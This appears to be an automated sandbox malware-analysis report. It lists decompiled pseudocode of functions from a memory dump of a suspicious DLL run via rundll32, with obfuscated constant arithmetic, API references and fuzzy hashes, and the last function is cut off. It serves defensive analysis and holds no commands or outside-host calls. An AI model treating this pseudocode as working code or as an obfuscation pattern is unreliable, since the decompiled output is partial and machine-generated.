                          				if (__rdx - 0xea2 - _a96 + 0xffffee57 <= 0) goto 0x8c08a5fa;
                          				_t60 = _a88;
                          				_v96 = 0x38e9;
                          				r9d = 0x3666;
                          				_v104 = 0x2598;
                          				r8d = 0x37e1;
                          				E00007FF87FF88C079AC0(_t60, __rcx, _t60, _t69);
                          				 *((long long*)(_t60 + 0x348)) = _t55;
                          				_t62 = __rcx ^ 0x0000a532;
                          				 *(_t60 + 0x158) = _t62;
                          				if ( *( *((intOrPtr*)(_t60 + 0x1a0)) + 0xb0) * 0x4b917808 == 0x2598) goto 0x8c08a5bc;
                          				 *(_t60 + 0x1b0) =  *(_t60 + 0x1b0) |  *( *((intOrPtr*)(_t60 + 0x1c0)) + 0x120) ^ 0x00002032;
                          				if (0x2599 != _t62) goto 0x8c08a590;
                          				_v96 = 0x3189;
                          				r9d = 0x3666;
                          				_v104 = 0x30d5;
                          				r8d = 0x37e1;
                          				E00007FF87FF88C079AC0(_t60, _t62, _t60, _t69);
                          				 *((long long*)(_t60 + 0x350)) = 0x2599;
                          				 *((long long*)(_t60 + 0x120)) =  *((long long*)(_t60 + 0x120)) + 0xfffff73c;
                          				return _t68 + 0x2103;
                          			}











                          0x7ff88c08a4a0
                          0x7ff88c08a4af
                          0x7ff88c08a4c7
                          0x7ff88c08a4d8
                          0x7ff88c08a4df
                          0x7ff88c08a4ee
                          0x7ff88c08a4f6
                          0x7ff88c08a4ff
                          0x7ff88c08a513
                          0x7ff88c08a519
                          0x7ff88c08a529
                          0x7ff88c08a532
                          0x7ff88c08a538
                          0x7ff88c08a53d
                          0x7ff88c08a548
                          0x7ff88c08a54d
                          0x7ff88c08a55d
                          0x7ff88c08a564
                          0x7ff88c08a57f
                          0x7ff88c08a5a5
                          0x7ff88c08a5ba
                          0x7ff88c08a5c1
                          0x7ff88c08a5ca
                          0x7ff88c08a5d0
                          0x7ff88c08a5d5
                          0x7ff88c08a5e3
                          0x7ff88c08a5e8
                          0x7ff88c08a5ef
                          0x7ff88c08a607

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: CreateCriticalFileHeapLeaveLockSection
                          • String ID: 8
                          • API String ID: 4149557297-406019892
                          • Opcode ID: 6afc501cdda84a8fadb91fbbbb11c393d55ba66f7b0e10c663e9cbf60baa1dbc
                          • Instruction ID: ff74dbd2f9daec340bab1ab70c5beef93b8fbc3c4f76233a6a4273b2c6205914
                          • Opcode Fuzzy Hash: 6afc501cdda84a8fadb91fbbbb11c393d55ba66f7b0e10c663e9cbf60baa1dbc
                          • Instruction Fuzzy Hash: 52617B736086C48AD762CF15E448B9EB7A8FB89794F054139EB8957B98CB38D990CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E00007FF87FF88C084898(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
                          				intOrPtr _v0;
                          				signed long long _v8;
                          				int _t33;
                          				long _t37;
                          				void* _t38;
                          				signed int _t39;
                          				int _t48;
                          				signed long long _t60;
                          				short* _t65;
                          				signed int* _t66;
                          				void* _t82;
                          				void* _t89;
                          				void* _t95;
                          				void* _t98;
                          				void* _t101;
                          				void* _t102;
                          
                          				_a8 = __rbx;
                          				_a24 = __rbp;
                          				E00007FF87FF88C087050(_t38, __rax, __rcx, _t82, __r8, _t95, _t98);
                          				_t60 =  *0x8c0b3760; // 0x812541c23493
                          				_a5176 = _t60 ^ _t89 - __rax;
                          				r14d = r9d;
                          				r10d = r10d & 0x0000003f;
                          				_t102 = _t101 + __r8;
                          				 *__rcx =  *__rcx & 0x00000000;
                          				__rcx[1] =  *((intOrPtr*)(0x8c0b4970 + (__edx >> 6) * 8));
                          				if (__r8 - _t102 >= 0) goto 0x8c0849db;
                          				_t65 =  &_a40;
                          				if (__r8 - _t102 >= 0) goto 0x8c084943;
                          				_t39 =  *__r8 & 0x0000ffff;
                          				if (_t39 != 0xa) goto 0x8c08492f;
                          				 *_t65 = 0xd;
                          				_t66 = _t65 + 2;
                          				 *_t66 = _t39;
                          				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x8c084911;
                          				_a16 = _a16 & 0x00000000;
                          				_a8 = _a8 & 0x00000000;
                          				_v0 = 0xd55;
                          				_v8 =  &_a1752;
                          				r9d = 0;
                          				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                          				_t48 = _t33;
                          				if (_t33 == 0) goto 0x8c0849d3;
                          				if (_t33 == 0) goto 0x8c0849c3;
                          				_v8 = _v8 & 0x00000000;
                          				r8d = _t48;
                          				r8d = r8d;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c0849d3;
                          				if (0 + _a24 - _t48 < 0) goto 0x8c084990;
                          				__rcx[1] = __edi - r15d;
                          				goto 0x8c084906;
                          				_t37 = GetLastError();
                          				 *__rcx = _t37;
                          				E00007FF87FF88C086D80();
                          				return _t37;
                          			}



















                          0x7ff88c084898
                          0x7ff88c08489d
                          0x7ff88c0848af
                          0x7ff88c0848b7
                          0x7ff88c0848c1
                          0x7ff88c0848d2
                          0x7ff88c0848e0
                          0x7ff88c0848e4
                          0x7ff88c0848fc
                          0x7ff88c0848ff
                          0x7ff88c084906
                          0x7ff88c08490c
                          0x7ff88c084914
                          0x7ff88c084916
                          0x7ff88c084921
                          0x7ff88c084928
                          0x7ff88c08492b
                          0x7ff88c08492f
                          0x7ff88c084941
                          0x7ff88c084943
                          0x7ff88c08494e
                          0x7ff88c08495c
                          0x7ff88c08496f
                          0x7ff88c084974
                          0x7ff88c08497e
                          0x7ff88c084984
                          0x7ff88c084988
                          0x7ff88c08498e
                          0x7ff88c084990
                          0x7ff88c0849a5
                          0x7ff88c0849ae
                          0x7ff88c0849b9
                          0x7ff88c0849c1
                          0x7ff88c0849c8
                          0x7ff88c0849ce
                          0x7ff88c0849d3
                          0x7ff88c0849d9
                          0x7ff88c0849e9
                          0x7ff88c084a09

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: ByteCharErrorFileLastMultiWideWrite
                          • String ID: U
                          • API String ID: 2456169464-4171548499
                          • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                          • Instruction ID: 8fa2b08fffa43b06e5ecaa749f1964bd7c446f61c31b3704f87496a2bbdd7127
                          • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                          • Instruction Fuzzy Hash: DD41A222B19A4182EB708F66E8553AA77A0FB897D4F408131EE8D8779CDF3CD505CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00007FF87FF88C0820A8(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
                          				void* _t43;
                          				signed int _t52;
                          				void* _t53;
                          				void* _t61;
                          				signed int _t64;
                          				signed char _t66;
                          				signed char _t75;
                          				signed int _t76;
                          				void* _t100;
                          				signed int _t109;
                          
                          				_t75 = __edx;
                          				_a8 = __rbx;
                          				_a24 = __rbp;
                          				 *__rcx = 0;
                          				r14d = r9d;
                          				_t76 = __edx;
                          				if (__eflags == 0) goto 0x8c08211a;
                          				if (__eflags == 0) goto 0x8c0820f9;
                          				if ((__edx & 0x00000003) - 1 == 1) goto 0x8c0820f2;
                          				_t43 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t43);
                          				goto 0x8c08211f;
                          				goto 0x8c08211f;
                          				asm("sbb eax, eax");
                          				goto 0x8c08211f;
                          				__rcx[1] = 0x80000000;
                          				_t52 = _t76 & 0x00000700;
                          				if ((_t75 & 0x00000008) == 0) goto 0x8c08218b;
                          				if (_t52 == 0x100) goto 0x8c082184;
                          				if (_t52 == 0x200) goto 0x8c08217d;
                          				if (_t52 == 0x300) goto 0x8c082176;
                          				if (_t52 == 0x400) goto 0x8c08218b;
                          				if (_t52 == 0x500) goto 0x8c08216f;
                          				if (_t52 == 0x600) goto 0x8c08217d;
                          				_t100 = _t52 - 0x700;
                          				if (_t100 == 0) goto 0x8c08216f;
                          				_t53 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t53);
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				__rcx[2] = 3;
                          				if (_t100 == 0) goto 0x8c0821e2;
                          				if (_t100 == 0) goto 0x8c0821db;
                          				if (_t100 == 0) goto 0x8c0821d4;
                          				if (_t100 == 0) goto 0x8c0821cd;
                          				if (_t100 == 0) goto 0x8c0821be;
                          				_t61 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t61);
                          				goto 0x8c0821e4;
                          				sil = __rcx[1] == 0x80000000;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				__rcx[5] = __rcx[5] & 0x00000000;
                          				bpl = 0x80;
                          				__rcx[3] = 0;
                          				__rcx[4] = 0x80;
                          				if ((bpl & dil) == 0) goto 0x8c0821fd;
                          				 *__rcx =  *__rcx | 0x00000010;
                          				if ((0x00008000 & _t76) != 0) goto 0x8c082225;
                          				if ((_t76 & 0x00074000) != 0) goto 0x8c082222;
                          				if (E00007FF87FF88C084DDC(_t75, __rax,  &_a16) != 0) goto 0x8c08229b;
                          				if (_a16 == 0x8000) goto 0x8c082225;
                          				 *__rcx =  *__rcx | bpl;
                          				if ((0x00000100 & _t76) == 0) goto 0x8c082245;
                          				_t64 =  *0x8c0b4dd4; // 0x0
                          				_t66 =  !_t64 & r14d;
                          				if ((bpl & _t66) != 0) goto 0x8c082245;
                          				__rcx[4] = 1;
                          				_t109 = dil & 0x00000040;
                          				if (_t109 == 0) goto 0x8c082259;
                          				asm("bts dword [ebx+0x14], 0x1a");
                          				asm("bts dword [ebx+0x4], 0x10");
                          				__rcx[3] = __rcx[3] | 0x00000004;
                          				asm("bt edi, 0xc");
                          				if (_t109 >= 0) goto 0x8c082262;
                          				__rcx[4] = __rcx[4] | 0x00000100;
                          				asm("bt edi, 0xd");
                          				if (_t109 >= 0) goto 0x8c08226d;
                          				asm("bts dword [ebx+0x14], 0x19");
                          				if ((dil & 0x00000020) == 0) goto 0x8c08227a;
                          				asm("bts dword [ebx+0x14], 0x1b");
                          				goto 0x8c082285;
                          				if ((dil & 0x00000010) == 0) goto 0x8c082285;
                          				asm("bts dword [ebx+0x14], 0x1c");
                          				return _t66;
                          			}













                          0x7ff88c0820a8
                          0x7ff88c0820a8
                          0x7ff88c0820ad
                          0x7ff88c0820bd
                          0x7ff88c0820c2
                          0x7ff88c0820c8
                          0x7ff88c0820d2
                          0x7ff88c0820d7
                          0x7ff88c0820dc
                          0x7ff88c0820de
                          0x7ff88c0820e3
                          0x7ff88c0820e9
                          0x7ff88c0820f0
                          0x7ff88c0820f7
                          0x7ff88c08210c
                          0x7ff88c082118
                          0x7ff88c08211f
                          0x7ff88c082129
                          0x7ff88c08212b
                          0x7ff88c082132
                          0x7ff88c082139
                          0x7ff88c082140
                          0x7ff88c082147
                          0x7ff88c08214e
                          0x7ff88c082155
                          0x7ff88c082157
                          0x7ff88c082159
                          0x7ff88c08215b
                          0x7ff88c082160
                          0x7ff88c082166
                          0x7ff88c08216d
                          0x7ff88c082174
                          0x7ff88c08217b
                          0x7ff88c082182
                          0x7ff88c082189
                          0x7ff88c082190
                          0x7ff88c082196
                          0x7ff88c08219b
                          0x7ff88c0821a0
                          0x7ff88c0821a5
                          0x7ff88c0821aa
                          0x7ff88c0821ac
                          0x7ff88c0821b1
                          0x7ff88c0821b7
                          0x7ff88c0821bc
                          0x7ff88c0821c7
                          0x7ff88c0821cb
                          0x7ff88c0821d2
                          0x7ff88c0821d9
                          0x7ff88c0821e0
                          0x7ff88c0821e4
                          0x7ff88c0821e8
                          0x7ff88c0821eb
                          0x7ff88c0821ee
                          0x7ff88c0821f8
                          0x7ff88c0821fa
                          0x7ff88c082204
                          0x7ff88c08220c
                          0x7ff88c08221a
                          0x7ff88c082220
                          0x7ff88c082222
                          0x7ff88c08222c
                          0x7ff88c08222e
                          0x7ff88c082236
                          0x7ff88c08223c
                          0x7ff88c08223e
                          0x7ff88c082245
                          0x7ff88c082249
                          0x7ff88c08224b
                          0x7ff88c082250
                          0x7ff88c082255
                          0x7ff88c082259
                          0x7ff88c08225d
                          0x7ff88c08225f
                          0x7ff88c082262
                          0x7ff88c082266
                          0x7ff88c082268
                          0x7ff88c082271
                          0x7ff88c082273
                          0x7ff88c082278
                          0x7ff88c08227e
                          0x7ff88c082280
                          0x7ff88c08229a

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo$_get_daylight
                          • String ID:
                          • API String ID: 72036449-0
                          • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                          • Instruction ID: 5df47e6e18ebaebc7e9b1d1f469532fd3cdc8f02e1f9d61042ffd119752d8ec2
                          • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                          • Instruction Fuzzy Hash: 03518F22D0C20686FF79592ADD0537A6AC0FB62BD5F29C435DB09862DEDF3DE940C681
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E00007FF87FF88C072A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
                          				void* __r13;
                          				void* __r14;
                          				void* __r15;
                          				intOrPtr _t93;
                          				intOrPtr _t99;
                          				signed int _t105;
                          				void* _t110;
                          				signed long long _t136;
                          				intOrPtr _t149;
                          				long long _t150;
                          				void* _t154;
                          				void* _t155;
                          				void* _t158;
                          				signed long long _t159;
                          				void* _t160;
                          				void* _t163;
                          				void* _t165;
                          				void* _t166;
                          				void* _t168;
                          				long long _t170;
                          				void* _t171;
                          
                          				r13d =  *(_t160 + 0x100);
                          				r10d = __r8 - 0x30d5;
                          				r12d =  *(_t160 + 0x108);
                          				r8d = __rcx - 0x1408;
                          				r13d = r13d + 0xffffda68;
                          				 *(_t160 + 0x100) = r10d;
                          				_t170 = __rdx;
                          				 *(_t160 + 0x108) = r8d;
                          				_t110 = __rcx + 0x61f;
                          				r9d = r9d + 0xffffeb0d;
                          				_t99 =  *((intOrPtr*)(_t160 + 0xf0)) + 0xffffd84e;
                          				 *((intOrPtr*)(_t160 + 0xd0)) = r9d;
                          				 *((intOrPtr*)(_t160 + 0xe8)) = _t99;
                          				r12d = r12d + 0xffffdc0a;
                          				r15d = r13d;
                          				if (_t99 - _t168 + 0x3189 >= 0) goto 0x8c072d94;
                          				if (_t99 - __r8 - 0x106 >= 0) goto 0x8c072d94;
                          				if (_t110 == _t154 - 0x3f3) goto 0x8c072d94;
                          				 *((long long*)(_t160 + 0xc8)) = __rbx;
                          				if (r12d - _t168 + 0x1f2c > 0) goto 0x8c072c16;
                          				_t149 =  *((intOrPtr*)(__rdx + 0x1c0));
                          				r9d = __r10 + 0x2598;
                          				_t136 =  *((intOrPtr*)(__rdx + 0x1e0));
                          				r10d = _t158 - 0x984;
                          				r11d = _t154 - 0x1956;
                          				r8d = _t166 + 0x2103;
                          				_t108 =  *(_t160 + 0x100) + 0x38e9;
                          				 *(__rdx + 0x68) =  *(_t149 + 0x188) * 0x5adf2c5c;
                          				 *(__rdx + 0xa0) = _t136 | 0x00002598;
                          				_t105 = _t168 + 0x27b2;
                          				 *((intOrPtr*)(_t160 + 0x60)) = _t154 - 0x12ab;
                          				 *(_t160 + 0x58) = r10d;
                          				 *((intOrPtr*)(_t160 + 0x50)) = r9d;
                          				 *((intOrPtr*)(_t160 + 0x48)) = r11d;
                          				 *((intOrPtr*)(_t160 + 0x40)) = _t155 + 0x4ca;
                          				 *((long long*)(__rdx + 0x1e0)) = _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59;
                          				 *(_t160 + 0x38) = _t105;
                          				 *(_t160 + 0x30) =  *(_t160 + 0x100) + 0x38e9;
                          				 *((long long*)(_t160 + 0x28)) = __rdx;
                          				 *((intOrPtr*)(_t160 + 0x20)) = _t110 + 0xffffeb3f;
                          				E00007FF87FF88C08D5F0( *((intOrPtr*)(_t160 + 0xe0)) + 0x3f3, _t136 | 0x00002598, _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59, _t149, __r8, _t163, _t165, _t168, __rdx, _t171);
                          				goto 0x8c072d8c;
                          				_t150 = r13d;
                          				_t159 = r12d;
                          				 *((long long*)(_t160 + 0x70)) = _t150;
                          				if (_t150 - _t159 *  *(__rdx + 0x198) < 0) goto 0x8c072c95;
                          				GetProcessHeap();
                          				if (r13d + 4 - _t159 *  *(__rdx + 0x198) >= 0) goto 0x8c072c43;
                          				r13d = r15d;
                          				r8d =  *(_t160 + 0x108);
                          				r9d =  *((intOrPtr*)(_t160 + 0xd0));
                          				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x8c072d8c;
                          				if ( *((intOrPtr*)(_t160 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d > 0) goto 0x8c072d8c;
                          				_t93 =  *((intOrPtr*)(__rdx + 0x78));
                          				if (_t93 - (_t154 + _t171 | _t105) > 0) goto 0x8c072d8c;
                          				asm("o16 nop [eax+eax]");
                          				 *(_t160 + 0x58) = 0x2743;
                          				 *((long long*)(_t160 + 0x50)) = 0x2de1;
                          				 *((long long*)(_t160 + 0x48)) = 0x19c7;
                          				r9d = 0x1ff4;
                          				 *((long long*)(_t160 + 0x40)) = 0x2e2f;
                          				r8d = 0x1c0c;
                          				 *(_t160 + 0x38) = 0x26f1;
                          				 *(_t160 + 0x30) = 0x1000;
                          				 *((long long*)(_t160 + 0x28)) = 0x1acd;
                          				 *((long long*)(_t160 + 0x20)) = 0x1f1c;
                          				 *0x8c0b4160 = E00007FF87FF88C08F8F0(_t93, _t108 & 0x00003189, _t93 - (_t154 + _t171 | _t105), ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d,  *((intOrPtr*)(_t160 + 0x70)), _t108, _t163, _t165);
                          				r15d = r15d ^ r13d &  *(_t170 + 0x188);
                          				 *(_t170 + 0xb0) = r8d |  *(_t170 + 0xd8);
                          				if (_t93 + 3 - (_t154 + _t171 | _t105) <= 0) goto 0x8c072cf0;
                          				return _t171 + 0x1f2c;
                          			}
























                          0x7ff88c072a83
                          0x7ff88c072a8b
                          0x7ff88c072aa0
                          0x7ff88c072aa8
                          0x7ff88c072aaf
                          0x7ff88c072ab6
                          0x7ff88c072abe
                          0x7ff88c072ac1
                          0x7ff88c072ad0
                          0x7ff88c072ad6
                          0x7ff88c072add
                          0x7ff88c072aea
                          0x7ff88c072af8
                          0x7ff88c072aff
                          0x7ff88c072b06
                          0x7ff88c072b0b
                          0x7ff88c072b1a
                          0x7ff88c072b28
                          0x7ff88c072b35
                          0x7ff88c072b40
                          0x7ff88c072b46
                          0x7ff88c072b4d
                          0x7ff88c072b54
                          0x7ff88c072b5b
                          0x7ff88c072b62
                          0x7ff88c072b86
                          0x7ff88c072b8e
                          0x7ff88c072b94
                          0x7ff88c072ba1
                          0x7ff88c072bb5
                          0x7ff88c072bca
                          0x7ff88c072bd4
                          0x7ff88c072bd9
                          0x7ff88c072bde
                          0x7ff88c072be3
                          0x7ff88c072be7
                          0x7ff88c072bf5
                          0x7ff88c072bff
                          0x7ff88c072c03
                          0x7ff88c072c08
                          0x7ff88c072c0c
                          0x7ff88c072c11
                          0x7ff88c072c16
                          0x7ff88c072c1c
                          0x7ff88c072c22
                          0x7ff88c072c32
                          0x7ff88c072c61
                          0x7ff88c072c7b
                          0x7ff88c072c82
                          0x7ff88c072c85
                          0x7ff88c072c8d
                          0x7ff88c072cae
                          0x7ff88c072ccb
                          0x7ff88c072cd1
                          0x7ff88c072cdd
                          0x7ff88c072ce6
                          0x7ff88c072cf0
                          0x7ff88c072cfe
                          0x7ff88c072d0c
                          0x7ff88c072d15
                          0x7ff88c072d1b
                          0x7ff88c072d24
                          0x7ff88c072d2a
                          0x7ff88c072d33
                          0x7ff88c072d3c
                          0x7ff88c072d45
                          0x7ff88c072d59
                          0x7ff88c072d6a
                          0x7ff88c072d77
                          0x7ff88c072d86
                          0x7ff88c072dad

                          APIs
                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF88C07906E), ref: 00007FF88C072C61
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID: /.$C'$-
                          • API String ID: 54951025-1702015707
                          • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                          • Instruction ID: 9c7a84dd35a83a2604f00d6349f8973aef6061ce686c901b9d6d4753d9879d53
                          • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                          • Instruction Fuzzy Hash: FF71AB72A086D6C6EB24CB04E498BEEB7A8F784788F014135DF8D47B58DB78E595CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00007FF87FF88C07F0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                          				void* _t4;
                          				void* _t9;
                          				intOrPtr _t11;
                          				intOrPtr _t14;
                          				void* _t23;
                          				void* _t29;
                          				void* _t32;
                          				void* _t33;
                          
                          				_t29 = __rdx;
                          				_t27 = __rcx;
                          				_t25 = __rbx;
                          				_t23 = __rax;
                          				_a8 = __rbx;
                          				GetLastError();
                          				_t11 =  *0x8c0b3888; // 0x6
                          				if (_t11 == 0xffffffff) goto 0x8c07f0fe;
                          				_t4 = E00007FF87FF88C07F5BC(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                          				if (__rax != 0) goto 0x8c07f13f;
                          				E00007FF87FF88C07E26C(_t4, _t27, _t29);
                          				_t32 = _t23;
                          				if (_t23 != 0) goto 0x8c07f11e;
                          				E00007FF87FF88C07E114(_t23, _t27);
                          				goto 0x8c07f15a;
                          				_t14 =  *0x8c0b3888; // 0x6
                          				if (E00007FF87FF88C07F614(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x8c07f117;
                          				E00007FF87FF88C07EE40(_t32, _t23);
                          				_t9 = E00007FF87FF88C07E114(_t23, _t32);
                          				if (_t32 == 0) goto 0x8c07f15a;
                          				SetLastError(??);
                          				return _t9;
                          			}











                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0de
                          0x7ff88c07f0e4
                          0x7ff88c07f0ef
                          0x7ff88c07f0f1
                          0x7ff88c07f0fc
                          0x7ff88c07f108
                          0x7ff88c07f10d
                          0x7ff88c07f113
                          0x7ff88c07f117
                          0x7ff88c07f11c
                          0x7ff88c07f11e
                          0x7ff88c07f131
                          0x7ff88c07f133
                          0x7ff88c07f13a
                          0x7ff88c07f142
                          0x7ff88c07f146
                          0x7ff88c07f159

                          APIs
                          • GetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F0DE
                          • SetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F146
                          • SetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F15C
                          • abort.LIBCMT ref: 00007FF88C07F162
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorLast$abort
                          • String ID:
                          • API String ID: 1447195878-0
                          • Opcode ID: 14fb433b7e048f1a59e981415866a122336172f1b26bc5c56a160eb1139b8d33
                          • Instruction ID: 6852cd3203e04baf55969b6dae345be4d4fe10664b6a2c96994eea04db491ba5
                          • Opcode Fuzzy Hash: 14fb433b7e048f1a59e981415866a122336172f1b26bc5c56a160eb1139b8d33
                          • Instruction Fuzzy Hash: 75015220B0A34A46FE5C6770E55A1382191BF66FD0F140438EA2E037DEEF2EF845C611
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 35%
                          			E00007FF87FF88C089F80(intOrPtr __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                          				void* __rdi;
                          				void* __rbp;
                          				void* __r12;
                          				signed short _t143;
                          				signed int _t145;
                          				signed int _t199;
                          				signed int _t205;
                          				intOrPtr _t206;
                          				signed int _t209;
                          				signed int _t211;
                          				signed short* _t239;
                          				void* _t241;
                          				signed long long _t242;
                          				void* _t246;
                          				signed long long _t248;
                          				void* _t250;
                          				CHAR* _t253;
                          				void* _t256;
                          				void* _t258;
                          				void* _t259;
                          				signed short* _t262;
                          				void* _t267;
                          				void* _t271;
                          				void* _t273;
                          				void* _t275;
                          				void* _t277;
                          
                          				_t267 = __r10;
                          				_t265 = __r9;
                          				_t246 = __rdx;
                          				_t241 = __rcx;
                          				 *((long long*)(_t258 + 0x18)) = __rbx;
                          				 *(_t258 + 0x20) = r9d;
                          				 *((intOrPtr*)(_t258 + 8)) = __ecx;
